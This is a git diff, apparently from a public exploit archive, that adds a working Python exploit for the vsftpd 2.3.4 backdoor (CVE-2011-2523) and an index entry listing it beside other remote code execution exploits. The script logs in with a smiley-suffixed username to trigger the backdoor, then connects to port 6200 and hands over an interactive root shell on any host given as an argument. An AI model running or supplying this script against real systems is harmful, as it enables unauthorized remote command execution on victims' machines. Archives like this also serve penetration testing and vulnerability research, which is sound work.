diff --git a/exploits/unix/remote/49757.py b/exploits/unix/remote/49757.py
new file mode 100755
index 000000000..e8b888c5e
--- /dev/null
+++ b/exploits/unix/remote/49757.py
@@ -0,0 +1,40 @@
+# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
+# Date: 9-04-2021
+# Exploit Author: HerculesRD
+# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
+# Version: vsftpd 2.3.4
+# Tested on: debian
+# CVE : CVE-2011-2523
+
+#!/usr/bin/python3   
+                                                           
+from telnetlib import Telnet 
+import argparse
+from signal import signal, SIGINT
+from sys import exit
+
+def handler(signal_received, frame):
+    # Handle any cleanup here
+    print('   [+]Exiting...')
+    exit(0)
+
+signal(SIGINT, handler)                           
+parser=argparse.ArgumentParser()        
+parser.add_argument("host", help="input the address of the vulnerable host", type=str)
+args = parser.parse_args()       
+host = args.host                        
+portFTP = 21 #if necessary edit this line
+
+user="USER nergal:)"
+password="PASS pass"
+
+tn=Telnet(host, portFTP)
+tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
+tn.write(user.encode('ascii') + b"\n")
+tn.read_until(b"password.") #if necessary, edit this line
+tn.write(password.encode('ascii') + b"\n")
+
+tn2=Telnet(host, 6200)
+print('Success, shell opened')
+print('Send `exit` to quit shell')
+tn2.interact()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 175338e5b..4dddecebe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18439,6 +18439,7 @@ id,file,description,date,author,type,platform,port
 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
+49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,